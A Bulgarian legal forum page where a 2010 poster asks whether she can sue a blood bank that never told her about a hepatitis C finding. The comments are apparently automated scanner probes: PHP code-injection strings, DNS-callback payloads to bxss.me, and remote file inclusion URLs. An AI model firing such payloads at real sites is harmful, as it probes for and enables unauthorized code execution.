Имам ли право да съдя кръвна банка

04.08.2010г. 12:03:11
През 2005г дарих кръв за моя близка. Преди няколко дни се наложи отново да даря. При проверка в компютъра служителката ми заявява, че не мога да даря, защото през 2005 г кръвта ми е върната, защото е заразена с хепатит C. 5 години никой не е благоволил да ме уведоми, че имам хепатит C, имам съпруг и две деца, които може би съм заразила, а да се увреди сериозно и здравето ми.

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:30
';print(md5(31337));$a='
lxbfYeaa
05.10.2023г. 07:30
";print(md5(31337));$a="
lxbfYeaa
05.10.2023г. 07:30
${@print(md5(31337))}
lxbfYeaa
05.10.2023г. 07:30
${@print(md5(31337))}\
lxbfYeaa
05.10.2023г. 07:30
'.print(md5(31337)).'
lxbfYeaa
05.10.2023г. 07:30
&n976855=v907795
lxbfYeaa
05.10.2023г. 07:30
'.gethostbyname(lc('hitzu'.'fcpolhdna4bcb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(76).chr(115).chr(76).'
lxbfYeaa
05.10.2023г. 07:30
".gethostbyname(lc("hitom"."pfyvbgifd5445.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(73).chr(116).chr(88)."
lxbfYeaa
05.10.2023г. 07:30
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
lxbfYeaa
05.10.2023г. 07:30
Http://bxss.me/t/fit.txt

Коментар